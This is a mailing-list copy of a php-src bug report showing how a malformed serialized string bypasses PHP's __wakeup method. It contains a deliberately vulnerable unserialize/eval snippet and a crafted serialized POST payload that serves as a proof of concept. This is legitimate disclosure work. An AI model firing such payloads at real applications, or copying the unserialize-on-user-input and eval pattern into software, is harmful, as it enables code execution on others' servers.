[php-src] Issue #9618: unserialize __wakeup bypass

From: Date: Tue, 27 Sep 2022 12:47:04 +0000
Subject: [php-src] Issue #9618: unserialize __wakeup bypass
Groups: php.bugs 
Request: Send a blank email to php-bugs+get-242467@lists.php.net to get a copy of this message
Issue: https://github.com/php/php-src/issues/9618 Author: Oatmeal-Lin ### Description The following code: ```php <?php class A { public $info; private $end = "1"; public function __destruct() { $this->info->func(); } } class B { public $end; public function __wakeup() { $this->end = "exit();"; echo '__wakeup'; } public function __call($method, $args) { eval('echo "aaaa";' . $this->end . 'echo "bbb"'); } } unserialize($_POST['data']); ``` I found an interesting bug. When the deserialized string contains a variable name with the wrong string length, the deserialization continues, but the __destruct() function is called before __wakeup is called. This way you can bypass __wakeup(). I've tested it on some versions and I'm not sure if others have this problem, it's also useful in the latest version. - 7.4.x -7.4.30 - 8.0.x [POST]data=O:1:"A":2:{s:4:"info";O:1:"B":1:{s:3:"end";N;}s:6:"Aend";s:1:"1";} This event also is triggered when - delete ) - Inconsistent number of class attributes - The length of the attribute key does not match. - The length of the attribute value does not match. - delete ; Expected Results: aaaa bbb __wakeup ### PHP Version PHP 7.4.x PHP8.0.x ### Operating System Windows/Linux

« previous php.bugs (#242467) next »